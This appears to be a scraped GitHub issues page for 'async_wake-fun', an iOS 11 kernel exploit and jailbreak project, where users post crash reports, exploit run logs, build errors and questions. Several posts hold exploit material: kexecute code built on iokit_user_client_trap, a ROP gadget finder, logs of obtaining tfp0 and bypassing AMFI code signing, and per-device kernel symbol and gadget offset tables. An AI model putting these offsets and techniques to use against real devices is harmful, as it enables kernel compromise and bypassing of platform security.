ninjaprawn / async_wake-fun Goto Github PK

The app causes the kernel panic on iPad Air 2.
The crash happens in:

void let_the_fun_begin(mach_port_t tfp0, mach_port_t user_client) {
...
    uint64_t bol = ZM_FIX_ADDR(kexecute(0xFFFFFFF0074A68C8+slide, 1, 0, 0, 0, 0, 0, 0));
...
}

uint64_t kexecute(mach_port_t user_client, uint64_t fake_client, uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint64_t x3, uint64_t x4, uint64_t x5, uint64_t x6) {
...
    uint64_t returnval = iokit_user_client_trap(user_client, 0, (uint64_t)(x1), (uint64_t)(x2), (uint64_t)(x3), (uint64_t)(x4), (uint64_t)(x5), (uint64_t)(x6)); // <---  crash is here
}

What is the constant address 0xFFFFFFF0074A68C8?

Last login: Sun Dec 17 17:35:38 on ttys005
Donovans-MBP:~ donovansims$ ssh root@(IP address)
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ECDSA key sent by the remote host is
SHA256:EyIR5McNaLzh7beO1kzlF70NsZd6LuJxjhPco+0CNZ4.
Please contact your system administrator.
Add correct host key in /Users/donovansims/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /Users/donovansims/.ssh/known_hosts:2
ECDSA host key for (IP address) has changed and you have requested strict checking.
Host key verification failed.
Donovans-MBP:~ donovansims$

what does that mean

Here Is The Log

no symbols for this device yet
tfp0 should still work, but the kernel debugger PoC won't
message size for kalloc.4096: 2956
got user client: 0x6107
[+] prepared kqueue
task self: 0xfffffff005f1b1e0
our task port is at 0xfffffff005f1b1e0
found target port with suitable allocation page offset: 0xfffffff007dc8e70
replacer_body_size: 0xb74
message_body_offset: 0x448
0
e00002c9
0
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
got replaced with replacer port 30
found kernel vm_map: 0xfffffff11c452420
second time got replaced with replacer port 0
will try to read from second port (fake kernel)
kernel read via fake kernel task port worked?
0x0000000000420000
0x0000000000000000
0xfffffff11c47a3c0
0xfffffff11c47a4b0
about to build safer tfp0
message buffer: fffffff006c61000
fake_kernel_task_kaddr: fffffff006c61000
read fake_task_refs: d00d
about to test new tfp0
kernel read via second tfp0 port worked?
0x0000000000420000
0x0000000000000000
0xfffffff11c47a3c0
0xfffffff11c47a4b0
built safer tfp0
about to clear up
cleared up
tfp0: 1888a0b
[fun] slide: 0x0000000018200000
[fun] Created fake_vtable at fffffff002000000
[fun] Copied some of the vtable over
[fun] Created fake_client at fffffff002004000
[fun] Copied the user client over
[fun] Wrote the add x0, x0, #0x40; ret; gadget over getExternalTrapForIndex

My phone would normally generate a kernel panic stating that there was a kernel stack memory corruption detected. I commented out that one line and everything worked fine (despite it not being able to read/write to kernel memory). Can anyone help?

getting this error on iPhone SE (11.1.1) and 5s (11.1.2)

@ninjaprawn. Did you tested inject_amfid? Did you run the apps from the shell on the device?
I opened the shell access to the device and I saw that inject_amfid is in zombie state (see below). Could you explain in details an idea of inject_amfid?
In my understanding, you try to hook the function MISValidateSignatureAndCopyInfo() in libmis.dylib by means of
remote_write(mach_task_self(), binary_load_address()+patch_offset, (uint64_t)&fake_func_addr, 8);
to redirect the call to fake_MISValidateSignatureAndCopyInfo() located in amfid_payload.dylib
But how will "amfid" call the fake_MISValidateSignatureAndCopyInfo() located in another address space (in inject_amfid)?
Also, I didn't notice messages from the amfid_payload.m

242 ?? SXs 0:02.31 /var/containers/Bundle/Application/F67C6B2C-F295-4442-9B16-81D88984FD3E/async_wake_ios.app/async_wake_ios
243 ?? Z 0:00.00 (inject_amfid)
244 ?? S 0:00.01 /usr/bin/bash

....

id
uid=0(root) gid=0(wheel) egid=501(mobile) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),20(staff),29(certusers),80(admin)

ls -al
total 3
drwxrwxr-t 20 root admin 640 Dec 24 14:01 .
drwxrwxr-t 20 root admin 640 Dec 24 14:01 ..
dr-xr-xr-t@ 2 root wheel 64 Nov 15 03:09 .HFS+ Private Directory Data
-rw-r--r-- 1 root admin 0 Dec 24 14:01 .bit_of_fun
---------- 1 root admin 0 Oct 3 05:38 .file
drwx------ 2 root wheel 64 Sep 30 06:28 .mb
drwxrwxr-x 65 root admin 2080 Nov 15 03:20 Applications
drwxrwxr-t 8 root admin 340 Oct 13 11:13 Developer
drwxrwxr-x 19 root admin 608 Nov 15 03:20 Library
drwxr-xr-x 3 root wheel 96 Sep 29 23:19 System
drwxr-xr-x 4 root wheel 128 Nov 15 03:20 bin
drwxrwxr-t 2 root admin 64 Oct 3 05:38 cores
dr-xr-xr-x 3 root wheel 1442 Dec 24 22:39 dev
lrwxr-xr-x 1 root admin 11 Nov 15 03:20 etc -> private/etc
dr----x--x 5 root admin 160 Dec 24 22:46 fun_bins
drwxr-xr-x 5 root wheel 160 Dec 13 14:37 private
drwxr-xr-x 14 root wheel 448 Nov 15 03:20 sbin
lrwxr-xr-x 1 root admin 15 Nov 15 03:20 tmp -> private/var/tmp
drwxr-xr-x 9 root wheel 288 Dec 13 14:36 usr
lrwxr-xr-x 1 root admin 11 Nov 15 03:20 var -> private/var

addr_t find_add_x0_x0_0x40_ret(void) {
addr_t off;
uint32_t *k;
k = (uint32_t *)(kernel + xnucore_base);
for (off = 0; off < xnucore_size - 4; off += 4, k++) {
if (k[0] == 0x91010000 && k[1] == 0xD65F03C0) {
return off + xnucore_base + kerndumpbase;
}
}
k = (uint32_t *)(kernel + prelink_base);
for (off = 0; off < prelink_size - 4; off += 4, k++) {
if (k[0] == 0x91010000 && k[1] == 0xD65F03C0) {
return off + prelink_base + kerndumpbase;
}
}
return 0;
}

Last version worked just fine before the AMFI commit, now this is my output

build_id: 15B202 sysname: Darwin nodename: Alexs-iPhone release: 17.2.0 version: Darwin Kernel Version 17.2.0: Fri Sep 29 18:14:50 PDT 2017; root:xnu-4570.20.62~4/RELEASE_ARM64_T8010 machine: iPhone9,3 this is iPhone 7, should work! message size for kalloc.4096: 2956 got user client: 0x6207 [+] prepared kqueue task self: 0xffffffe003f1a610 our task port is at 0xffffffe003f1a610 found target port with suitable allocation page offset: 0xffffffe006e75d88 replacer_body_size: 0xb74 message_body_offset: 0x448 0 e00002c9 0 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 got replaced with replacer port 42 found kernel vm_map: 0xfffffff10e4660c0 second time got replaced with replacer port 0 will try to read from second port (fake kernel) kernel read via fake kernel task port worked? 0x0000000000420000 0x0000000000000000 0xfffffff10e48e280 0xffffffe003ee1f90 about to build safer tfp0 message buffer: ffffffe006e19000 fake_kernel_task_kaddr: ffffffe006e19000 read fake_task_refs: d00d about to test new tfp0 kernel read via second tfp0 port worked? 0x0000000000420000 0x0000000000000000 0xfffffff10e48e280 0xffffffe003ee1f90 built safer tfp0 about to clear up cleared up tfp0: 1888b0b have symbols for this device, testing the kernel debugger... trying to pin to cpu0: fffffff012a2d098 pin_current_thread yielding cpu pin_current_thread back on cpu running on fffffff012a2d098 message buffer: ffffffe006e18000 message buffer: ffffffe006f70c00 message buffer: ffffffe006e1a000 kcall object allocated via early_kalloc at ffffffe006e1a000 return val 1888f0b returned from trying to set the KDE bit thread_t_addr: ffffffe004202030 bvr0 read from the DebugData: 0xfffffff012839b20 bcr0 read from the DebugData: 0x000001e5 set ARM_DBG_CR_MODE_CONTROL_ANY started monitor thread message buffer: ffffffe006f70400 monitor thread running, pinning to core message buffer: ffffffe006f70000 trying to pin to cpu0: fffffff012a2d098 pin_current_thread yielding cpu pin_current_thread back on cpu running on fffffff012a2d098 monitor thread pinned kstackptr: ffffffe0a93d3ca0 sp: ffffffe0a93d3270 found the saved state probably at ffffffe0a93d3360 0000004800000015 ffffffe005291d70 ffffffe003ef8290 ffffffe003ef82d0 ffffffe003ef82a8 0000000000000000 0000000000000000 000000000000000b 0000000000000000 ffffffe004202030 0000000000000003 0000000000000004 0000000000000009 0000000000000009 ffffffe005291d70 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 ffffffe006f70400 ffffffe003ef8290 fffffff0124ae7d8 fffffff0124ae7d8 00000000000000ec ffffffe004202030 0000000000000000 ffffffe006f70448 ffffffe006f70510 0000000000000004 ffffffe0a93d3c80 fffffff0125deeb0 ffffffe0a93d3b50 fffffff012839b20 ffffffe020000104 000000016d683060 0000002cc6000022 000000016d33c9f0 0000008400000017 00000000035e6400 a different string! return val 1888f0b syscall returned monitor exited slide: 0x000000000b400000 Created fake_vtable at ffffffe00003c000 Copied some of the vtable over Created fake_client at ffffffe000040000 Copied the user client over Wrote the add x0, x0, #0x40; ret;gadget over getExternalTrapForIndex found amfid - getting task our proc is at 0xffffffe005291d70 kern proc is at 0xfffffff012a4dd10 our uid is 0 wrote test file: 0x103002488 remounting: 0 File already exists! Did we mount / as read+write? yes trust cache at: ffffffe003adb800 19 19 19 19 80000022 02 0b 0e 1b 25 2a 80000028 2c 0c 0c 0c 0c 26 29 49840 - 1008 0000029d 19 19 19 19 80000022 02 0b 0e 1b 25 2a 80000028 2c 0c 26 29 72208 - 752 000002bc 240 rv=0 2017-12-17 16:26:47.795 test_fsigned[240:4843] hi there im trying to live ok empower 2017-12-17 16:26:52.821 test_fsigned[240:4843] Springboard: (os/kern) failure 2017-12-17 16:26:52.834575+0200 async_wake_ios[236:4685] ♫ KPP never bothered me anyway... ♫ Message from debugger: Terminated due to signal 9

and the app crashes.

Iphone 7, IOS 11.1.2, built on macOS 10.13.2, 2009 MacBook Pro.

Before in the xcode console an lldb prompt would appear. Doesnt anymore?

Something in fun.c causing kernel panic on iPhone 6, IOS version 11.0.3. Provided the crash log too for extra info.

Unknown (null).txt

@ninjaprawn Is there any difference between ian beer's kcall method and your kexecute? You have edited a few line in kcall so why don't you use kcall instead of creating kexecute?
Pls answer me. I really wanna know
Thanks a lot :)

I know it is supported for iOS 11.1.2 but I want to know about iOS-s 11.0 - 11.1.2.

When I run this project, it shows 'libproc.h' file not found which located in AppDelegate.m.

Hi, i added new symbols to get my iPad mini 2 working while adding a few other symbols for my friends, but in my testing my iPad resprings, any thoughts

here is the console
build_id: 15B202 sysname: Darwin nodename: iPad release: 17.2.0 version: Darwin Kernel Version 17.2.0: Fri Sep 29 18:14:49 PDT 2017; root:xnu-4570.20.62~4/RELEASE_ARM64_S5L8960X machine: iPad4,4 this is iPad Mini 2 WiFi, should work! message size for kalloc.4096: 2956 got user client: 0x6107 [+] prepared kqueue task self: 0xfffffff002afe498 our task port is at 0xfffffff002afe498 found target port with suitable allocation page offset: 0xfffffff005976b90 replacer_body_size: 0xb74 message_body_offset: 0x448 0 e00002c9 0 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 got replaced with replacer port 52 found kernel vm_map: 0xfffffff11e5866e0 second time got replaced with replacer port 0 will try to read from second port (fake kernel) kernel read via fake kernel task port worked? 0x0000000000420000 0x0000000000000000 0xfffffff11e590890 0xfffffff11e5907f0 about to build safer tfp0 message buffer: fffffff00f027000 fake_kernel_task_kaddr: fffffff00f027000 read fake_task_refs: d00d about to test new tfp0 kernel read via second tfp0 port worked? 0x0000000000420000 0x0000000000000000 0xfffffff11e590890 0xfffffff11e5907f0 built safer tfp0 about to clear up cleared up tfp0: 188920b have symbols for this device, testing the kernel debugger... trying to pin to cpu0: fffffff01e9e90c8 pin_current_thread yielding cpu pin_current_thread back on cpu running on fffffff01e9e90c8 message buffer: fffffff00f03e000 message buffer: fffffff00d1fe400 message buffer: fffffff00f03f000 kcall object allocated via early_kalloc at fffffff00f03f000

and is the offsets i have
`// ip7
uint64_t ksymbols_iphone_7_15B202[] = {
0xfffffff0074d74cc, // KSYMBOL_OSARRAY_GET_META_CLASS,
0xfffffff007566454, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
0xfffffff007567bfc, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
0xfffffff0073eb130, // KSYMBOL_CSBLOB_GET_CD_HASH
0xfffffff007101248, // KSYMBOL_KALLOC_EXTERNAL
0xfffffff007101278, // KSYMBOL_KFREE
0xfffffff0074d74d4, // KYSMBOL_RET
0xfffffff0074f11cc, // KSYMBOL_OSSERIALIZER_SERIALIZE,
0xfffffff00758c618, // KSYMBOL_KPRINTF
0xfffffff0074fc164, // KSYMBOL_UUID_COPY
0xfffffff0075b2000, // KSYMBOL_CPU_DATA_ENTRIES
0xfffffff0070cc1d4, // KSYMBOL_VALID_LINK_REGISTER
0xfffffff0070cc1ac, // KSYMBOL_X21_JOP_GADGET
0xfffffff0070cc474, // KSYMBOL_EXCEPTION_RETURN
0xfffffff0070cc42c, // KSYMBOL_THREAD_EXCEPTION_RETURN
0xfffffff0071e1998, // KSYMBOL_SET_MDSCR_EL1_GADGET
0xfffffff007439b20, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // this is actually 1 instruction in to the entrypoint
0xfffffff0071de074, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP
0xfffffff0071dea24, // KSYMBOL_SLEH_SYNC_EPILOG
};

uint64_t ksymbols_iphone_x_15B202[] = {
0xfffffff0074f9948, // KSYMBOL_OSARRAY_GET_META_CLASS,
0xfffffff00758b03c, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
0xfffffff00758c7b0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
0xfffffff007400974, // KSYMBOL_CSBLOB_GET_CD_HASH
0xfffffff00710232c, // KSYMBOL_KALLOC_EXTERNAL
0xfffffff00710235c, // KSYMBOL_KFREE
0xfffffff007102358, // KYSMBOL_RET
0xfffffff007513324, // KSYMBOL_OSSERIALIZER_SERIALIZE,
0xfffffff0075b2694, // KSYMBOL_KPRINTF
0xfffffff00751e1d8, // KSYMBOL_UUID_COPY
0xfffffff0075d6000, // KSYMBOL_CPU_DATA_ENTRIES
0xfffffff0070cc1d4, // KSYMBOL_VALID_LINK_REGISTER
0xfffffff0070cc1ac, // KSYMBOL_X21_JOP_GADGET
0xfffffff0070cc474, // KSYMBOL_EXCEPTION_RETURN
0xfffffff0070cc42c, // KSYMBOL_THREAD_EXCEPTION_RETURN
0xfffffff0071e8630, // KSYMBOL_SET_MDSCR_EL1_GADGET
0xfffffff007454194, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // this is actually 1 instruction in to the entrypoint
0xfffffff0071e451c, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP
0xfffffff0071e4ed8, // KSYMBOL_SLEH_SYNC_EPILOG
};

uint64_t ksymbols_ipod_touch_6g_15b202[] = {
0xFFFFFFF0074A4A4C, // KSYMBOL_OSARRAY_GET_META_CLASS,
0xFFFFFFF007533CF8, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
0xFFFFFFF0075354A0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
0xFFFFFFF0073B71E4, // KSYMBOL_CSBLOB_GET_CD_HASH
0xFFFFFFF0070C8710, // KSYMBOL_KALLOC_EXTERNAL
0xFFFFFFF0070C8740, // KSYMBOL_KFREE
0xFFFFFFF0070C873C, // KYSMBOL_RET
0xFFFFFFF0074BE978, // KSYMBOL_OSSERIALIZER_SERIALIZE,
0xFFFFFFF007559FD0, // KSYMBOL_KPRINTF
0xFFFFFFF0074C9910, // KSYMBOL_UUID_COPY
0xFFFFFFF00757E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment
0xFFFFFFF00709818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
0xFFFFFFF007098164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
0xFFFFFFF007098434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
0xFFFFFFF0070983E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
0xFFFFFFF0071AD144, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
0xFFFFFFF0074062F4, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
0xFFFFFFF0071A90C0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
0xFFFFFFF0071A9ABC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
};

// 6p (N56ap)
uint64_t ksymbol_iphone_6p_15b202[] = {
0xfffffff0074a4a4c, // __ZNK7OSArray12getMetaClassEv
0xfffffff007533cf8, // __ZNK12IOUserClient12getMetaClassEv
0xfffffff0075354a0, // __ZN12IOUserClient24getTargetAndTrapForIndexEPP9IOServicej
0xfffffff0073b71e4, // _csblob_get_cdhash
0xfffffff0070c8710, // _kalloc_external
0xfffffff0070c8740, // _kfree
0xFFFFFFF0070C873C, // ret
0xfffffff0074be978, // __ZNK12OSSerializer9serializeEP11OSSerialize
0xfffffff007559fd0, // kprintf
0xfffffff0074c9910, // _uuid_copy
0xfffffff00757E000, // _DATA:__data + 0x6000
// 0x4DDE74 +
0xFFFFFFF00709818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
0xFFFFFFF007098180, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
0xFFFFFFF007098434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
0xFFFFFFF0070983E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
0xFFFFFFF0071ACCB8, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
0xFFFFFFF0074062F0, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
0xFFFFFFF0071A90C0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
0xFFFFFFF0071A9ABC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."

};

uint64_t ksymbols_iphone_6s_15b202[] = {
0xFFFFFFF00748D548, // KSYMBOL_OSARRAY_GET_META_CLASS,
0xFFFFFFF00751C4D0, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
0xFFFFFFF00751DC78, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
0xFFFFFFF0073A1054, // KSYMBOL_CSBLOB_GET_CD_HASH
0xFFFFFFF0070B8088, // KSYMBOL_KALLOC_EXTERNAL
0xFFFFFFF0070B80B8, // KSYMBOL_KFREE
0xFFFFFFF0070B80B4, // KYSMBOL_RET
0xFFFFFFF0074A7248, // KSYMBOL_OSSERIALIZER_SERIALIZE,
0xFFFFFFF0075426C4, // KSYMBOL_KPRINTF
0xFFFFFFF0074B21E0, // KSYMBOL_UUID_COPY
0xFFFFFFF007566000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment
0xFFFFFFF00708818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
0xFFFFFFF007088164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
0xFFFFFFF007088434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
0xFFFFFFF0070883E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
0xFFFFFFF007197AB0, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
0xFFFFFFF0073EFB44, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
0xFFFFFFF0071941D8, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
0xFFFFFFF007194BBC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
};

uint64_t ksymbols_iphone_6_15b202[] = {
0xFFFFFFF0074A4A4C, // KSYMBOL_OSARRAY_GET_META_CLASS,
0xFFFFFFF007533CF8, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
0xFFFFFFF0075354A0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
0xFFFFFFF0073B71E4, // KSYMBOL_CSBLOB_GET_CD_HASH
0xFFFFFFF0070C8710, // KSYMBOL_KALLOC_EXTERNAL
0xFFFFFFF0070C8740, // KSYMBOL_KFREE
0xFFFFFFF0070C873C, // KYSMBOL_RET
0xFFFFFFF0074BE978, // KSYMBOL_OSSERIALIZER_SERIALIZE,
0xFFFFFFF007559FD0, // KSYMBOL_KPRINTF
0xFFFFFFF0074C9910, // KSYMBOL_UUID_COPY
0xFFFFFFF00757E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment
0xFFFFFFF00709818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
0xFFFFFFF007098164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
0xFFFFFFF007098434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
0xFFFFFFF0070983E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
0xFFFFFFF0071AD144, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
0xFFFFFFF0074062F4, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
0xFFFFFFF0071A90C0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
0xFFFFFFF0071A9ABC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
};

uint64_t ksymbols_ipad_mini_2_wifi_15b202[] = {
0xFFFFFFF0074947EC, // KSYMBOL_OSARRAY_GET_META_CLASS,
0xFFFFFFF007523A98, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
0xFFFFFFF007525240, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
0xFFFFFFF0073A6F84, // KSYMBOL_CSBLOB_GET_CD_HASH
0xFFFFFFF0070B8590, // KSYMBOL_KALLOC_EXTERNAL
0xFFFFFFF0070B85C0, // KSYMBOL_KFREE
0xFFFFFFF0070B85BC, // KYSMBOL_RET
0xFFFFFFF0074AE718, // KSYMBOL_OSSERIALIZER_SERIALIZE,
0xFFFFFFF007549D40, // KSYMBOL_KPRINTF
0xFFFFFFF0074B96B0, // KSYMBOL_UUID_COPY
0xFFFFFFF00756E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment
0xFFFFFFF00708818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
0xFFFFFFF007088164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
0xFFFFFFF007088434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
0xFFFFFFF0070883E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
0xFFFFFFF00719CF44, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
0xFFFFFFF0073F6094, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
0xFFFFFFF007198EC0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
0xfffffff0071998BC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
};`

and here are the symbols i have
if (strstr(u.machine, "iPod7,1")) { printf("this is iPod Touch 6G, should work!\n"); symbols = ksymbols_ipod_touch_6g_15b202; have_syms = 1; } else if (strstr(u.machine, "iPhone9,3")) { printf("this is iPhone 7, should work!\n"); symbols = ksymbols_iphone_7_15B202; have_syms = 1; } else if (strstr(u.machine, "iPhone9,4")) { printf("this is iPhone 7 plus, should work!\n"); symbols = ksymbols_iphone_7_15B202; have_syms = 1; } else if (strstr(u.machine, "iPhone10,6")) { printf("this is iPhone X, should work!\n"); symbols = ksymbols_iphone_x_15B202; have_syms = 1; } else if (strstr(u.machine, "iPhone8,1")) { printf("this is iPhone 6s, should work!\n"); symbols = ksymbols_iphone_6s_15b202; have_syms = 1; } else if (strstr(u.machine, "iPhone7,1")) { printf("this is iPhone 6P, should work!\n"); symbols = ksymbol_iphone_6p_15b202; have_syms = 1; } else if (strstr(u.machine, "iPhone7,2")) { printf("this is iPhone 6, should work!\n"); symbols = ksymbols_iphone_6_15b202; have_syms = 1; } else if (strstr(u.machine, "iPad4,4")) { printf("this is iPad Mini 2 WiFi, should work!\n"); symbols = ksymbols_ipad_mini_2_wifi_15b202; have_syms = 1; } else if (strstr(u.machine, "iPhone6,2")) { printf("this is iPhone 5s, should work!\n"); symbols = ksymbols_ipad_mini_2_wifi_15b202; have_syms = 1; } else { printf("no symbols for this device yet\n"); printf("tfp0 should still work, but the kernel debugger PoC won't\n"); symbols = NULL; have_syms = 0; }

i have used some of this code from another async project.

Hi, async_wake-fun current commit was working fine until about half an hour ago where i started getting kernel panics everytime i ran async_wake-fun, i didn't change any code from the working version at all.

Seeing that the xnu kernel uses PIC to randomize data and code locations, how are we meant to find and use the offsets (for kernel instructions) in this if they are in a different location every time?

Luca said that his kpp bypass from yalu102 still work in ios 11.1.2 with few changes. Have you try it?

"_file_exist", referenced from:

_let_the_fun_begin in fun.o

"_get_code_directory", referenced from:

_let_the_fun_begin in fun.o

"_get_sha256", referenced from:

_let_the_fun_begin in fun.o

"_kalloc", referenced from:

_let_the_fun_begin in fun.o

(maybe you meant: _early_kalloc, _message_size_for_kalloc_size , _send_kalloc_message )

"_kwrite", referenced from:

_let_the_fun_begin in fun.o

"_kwrite32", referenced from:

_let_the_fun_begin in fun.o

"_init_kernel_utils", referenced from:

_let_the_fun_begin in fun.o

"_kread32", referenced from:

_let_the_fun_begin in fun.o

"_kread", referenced from:

_let_the_fun_begin in fun.o

_init_kernel in patchfinder64.o

"_kread64", referenced from:

_kexecute in fun.o

_let_the_fun_begin in fun.o

"_cp", referenced from:

_let_the_fun_begin in fun.o

"_kwrite64", referenced from:

_kexecute in fun.o

_let_the_fun_begin in fun.o

Symbol(s) not found for architecture arm64